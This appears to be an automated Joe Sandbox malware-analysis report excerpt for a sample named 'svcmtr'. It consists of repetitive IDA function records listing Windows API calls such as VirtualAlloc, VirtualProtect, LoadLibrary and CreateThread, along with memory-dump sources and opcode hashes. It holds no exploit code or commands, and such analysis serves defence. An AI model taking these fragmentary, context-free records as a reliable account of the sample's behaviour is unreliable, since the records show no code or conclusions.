                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free
                                                                                                                            • String ID: 172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC$lIC
                                                                                                                            • API String ID: 269201875-1019445454
                                                                                                                            • Opcode ID: 12c2dea4cb6f7e1698baaf94613219b82afe0b96f6d98cbe3bed5ded39d616b2
                                                                                                                            • Instruction ID: 32f57241c02f5393bf1391ab83f59f06f9657c66791189926f83ff8051c085f3
                                                                                                                            • Opcode Fuzzy Hash: 12c2dea4cb6f7e1698baaf94613219b82afe0b96f6d98cbe3bed5ded39d616b2
                                                                                                                            • Instruction Fuzzy Hash: AB4122716001129BC710EB65EC8196F73E4AF89318F18487AFC45B73A2C77DAD4987DA
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 00231E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457
                                                                                                                            • Opcode ID: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction ID: 776a5c64f1a306dd56843be8127c0eba6ea4a7ea08eb195fb411112e3a0670e1
                                                                                                                            • Opcode Fuzzy Hash: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction Fuzzy Hash: 7591ACF6A30622DAFF1C5670CC66BBC2516E7E0700F28E52DA203D9593DEFD48759910
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: b20c1959161d0f1f9c531eb60a5189586cdbcece0d3637516fb23815953db608
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: C951E777E201249FEF0CCF69DC91ABCB7A2FBD4310F1A9129D506EF691DA7899108650
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction ID: 30c78a522f2e71bc220e65b5c7970da539e64260b9fdfd2025595f88e36ee212
                                                                                                                            • Opcode Fuzzy Hash: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction Fuzzy Hash: B4417EF3A301128BEB0C5BA8CD66BBDA599E7D4700F2CD53DA003D92C2DEBC44709960
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 002313E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction ID: 2c4837a0af600eb7f25f44e8345b599641db20ef1f249705d6615fcd0763e197
                                                                                                                            • Opcode Fuzzy Hash: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction Fuzzy Hash: 7041A577E20124DFDF0CCF99D881AACB7B2FBD4310F169169D906AF691DB7499108A90
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 00231666
                                                                                                                              • Part of subcall function 0023172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction ID: 60459ea788514fb387b3a35e0d280d9ae4b321a29c886091a4ac0bfa301d5fbb
                                                                                                                            • Opcode Fuzzy Hash: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction Fuzzy Hash: B0415EB3A341129BDB0C5BA8CD566BDB6A5EBD4301F2DD62DD003DA286DFBC44709A60
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B830
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041B84C
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B853
                                                                                                                            • GlobalMemoryStatus.KERNEL32(?), ref: 0041B866
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041B8A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCountCurrentFreeGlobalHandleLibraryMemoryProcessStatusTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3344549487-0
                                                                                                                            • Opcode ID: 8ec9495c5c8c3def42768fa3f7287ae333d64ad60be0a61d2b8b86069c3be97d
                                                                                                                            • Instruction ID: 246000e8983a6ad2c6fa842b23d7700f142d6bf1d3abb13d60bd01c03ee38282
                                                                                                                            • Opcode Fuzzy Hash: 8ec9495c5c8c3def42768fa3f7287ae333d64ad60be0a61d2b8b86069c3be97d
                                                                                                                            • Instruction Fuzzy Hash: DD2174706147058BC720EF75D884BABB7F8FB85700F00C93EE54996250EB78D8858B9A
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                            • ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandlePointerRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4133201480-0
                                                                                                                            • Opcode ID: 1a1e99fa9a9fddd772163efd5d35fe45a9f919362a9285d703c580583bd4ed59
                                                                                                                            • Instruction ID: 434d6d844fe2b3ef8dad71a426d5a1eb9601029910844f721659a462d3881f6e
                                                                                                                            • Opcode Fuzzy Hash: 1a1e99fa9a9fddd772163efd5d35fe45a9f919362a9285d703c580583bd4ed59
                                                                                                                            • Instruction Fuzzy Hash: C7F06835A8535476FB20A7946C0AFED7B68C705B11F100196FF04B61D0E6A51A55C3AE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction ID: 2becfb1312bca027ec711fc72dfe731846032c906d6c346913d924ad6d5e0069
                                                                                                                            • Opcode Fuzzy Hash: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction Fuzzy Hash: A37156FAA74722DAFB1C62B4CC66BBC2416EBE0711F68A52DA303D95D3CEEC44645910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction ID: 1f2713b15d191a3e6ff4aa7b7b5bb86564c5ab67c13c1dd1677a4f5e2cf529fb
                                                                                                                            • Opcode Fuzzy Hash: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction Fuzzy Hash: D46188FAA30722DAFB1C52B4CC66BBC6456EBE0710F2CF52DA203D8593CEEC44649910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction ID: 4c5889ccbfee01b959fb99ad92e9a9818881da2afc227050a63deb5dc84a1498
                                                                                                                            • Opcode Fuzzy Hash: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction Fuzzy Hash: B5518AFAA34722DAFB1C52B4CD56BBC2416E7E0710F28F52DA343D9593CEEC44689910
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction ID: 7cbc2ba3af5a4e56bee967a37a3363aaa9e13873e80c38a29cd49190461c2271
                                                                                                                            • Opcode Fuzzy Hash: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction Fuzzy Hash: 0F6166F2B746528EEB0D8A68CCA17BD6696EBC0301F28D13DCA43DA1D5DEF844718A50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction ID: c166ac209fa431da22314d504f111604cd9e5dd1dcf0258f41aa6a2790330bca
                                                                                                                            • Opcode Fuzzy Hash: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction Fuzzy Hash: 2B519CFAA34722DAFB1C52A4CD56BBC2516E7E0710F2CF52DA343D9587CEEC44689910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction ID: b4e4918b73231de077afd7453380209ab017ed3985eec5590f99093f13a64a07
                                                                                                                            • Opcode Fuzzy Hash: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction Fuzzy Hash: F451ACF6A34722DAFB1C52A4CD56BBC2512EBE0710F28E12DA343E9583CEEC44689910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction ID: 8e4ecb22d3db65a7f38ff8f47668fc3003e4c317f8715ea9487af5c1e964df93
                                                                                                                            • Opcode Fuzzy Hash: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction Fuzzy Hash: 60518DF7A74722DAFB1C52A4CD66BBC2516E7D0710F28E52DA343E91C7CDEC44689910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction ID: 383667d6ffd92839c42c6a43828ab1bd69b0dc22cbcbeb1007246b81f0adb493
                                                                                                                            • Opcode Fuzzy Hash: e44e123d472ca776dadcfcb1c9fda16aa2fa90f9e914cf17207ec698cff7ed6e
                                                                                                                            • Instruction Fuzzy Hash: 9251ABF6A34722DAEB1C52A4CD56BBC7512EBE0711F28E12DA347E9187CEF804689910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction ID: 8f4d7a4349490d568e7788745f75adf1e12b3fc16a7331c88b43dc1f1468f618
                                                                                                                            • Opcode Fuzzy Hash: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction Fuzzy Hash: A541BBF6A34722DBFB1C52A4CD52BBC7512EBE0710F28A129A347E9187CDFC08689910
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32(?,?,?,?,004137A9,gpmus,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00425318: __getptd.LIBCMT ref: 0042531D
                                                                                                                            • _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 0042532A: __getptd.LIBCMT ref: 0042532A
                                                                                                                            • Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$CountSleepTick_rand
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1716435427-0
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 4dffdbea92ce661ec6c71f9f0e5703b0b4cddb7dd2a9a2379281bc5435b63fc0
                                                                                                                            • Instruction ID: 74fd737fc825ae388329666ed008e4d7fa41db048e3919a37a49896fcb432940
                                                                                                                            • Opcode Fuzzy Hash: 4dffdbea92ce661ec6c71f9f0e5703b0b4cddb7dd2a9a2379281bc5435b63fc0
                                                                                                                            • Instruction Fuzzy Hash: 1F51C3B7A002069BCB10EE69DC816ABB3A5ABC0754F08093AEC14D7341EB39ED5587E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction ID: 449e80f75d264111357b629d59a222e0fdd5b01d0af2e3d3ff73ebd82646f21e
                                                                                                                            • Opcode Fuzzy Hash: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction Fuzzy Hash: 4A317BF7A30A22E6FB1C2274CE66B79544AE7E0700F6CE53DA387D8187CCED04685460
                                                                                                                            APIs
